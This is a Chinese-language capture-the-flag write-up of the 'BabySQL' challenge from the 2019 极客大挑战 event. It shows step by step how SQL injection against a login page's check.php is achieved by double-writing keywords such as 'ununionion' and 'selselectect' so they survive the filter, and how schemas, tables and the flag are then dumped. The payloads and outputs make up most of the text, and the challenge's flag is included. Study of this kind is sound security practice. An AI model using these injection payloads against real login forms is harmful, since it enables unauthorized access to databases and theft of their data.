极客大挑战_2019 BabySQL

[极客大挑战 2019]BabySQL

有登录的一般都会想到万能密码，过滤了大不了绕过吧，和前面没多大区别

check.php?username=admin' or '1'='1 %23&password=password

未能成功，双写绕过or试试

check.php?username=admin' oorr '1'='1 %23&password=password

这里确实存在注入点，成功了，开始注入

check.php?username=' union select 1,2  %23&password=password
报错，双写union select
check.php?username=' ununionion selselectect 1,2  %23&password=password
The used SELECT statements have a different number of columns

check.php?username=admin' ororderder by 3 %23&password=2
order被pass了，直接挨着猜
check.php?username=' ununionion selselectect 1,2,3  %23&password=2
3列，哈哈

check.php?username=' ununionion selselectect 1,version(),database()  %23&password=2
//Hello 10.3.18-MariaDB！
//Your password is 'geek'
//得到数据库版本和当前数据库名称

爆所有数据库名

check.php?username=' ununionion selselectect 1,2,group_concat(schema_name) frofromm infoorrmation_schema.schemata  %23&password=2
Hello 2！
Your password is 'information_schema,mysql,performance_schema,test,ctf,geek'

ctf可疑，爆表名

check.php?username=%27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema='ctf' %23&password=1 
Hello 2！
Your password is 'Flag'

爆列名

check.php?username=%27 ununionion seselectlect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns)
whwhereere table_name='Flag' %23&password=1 
Hello 2！
Your password is 'flag'

爆数据

check.php?username=%27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23&password=1 
Hello 2！
Your password is 'flag{cc46361f-7094-4e08-a744-2c4c3fcc9eb0}'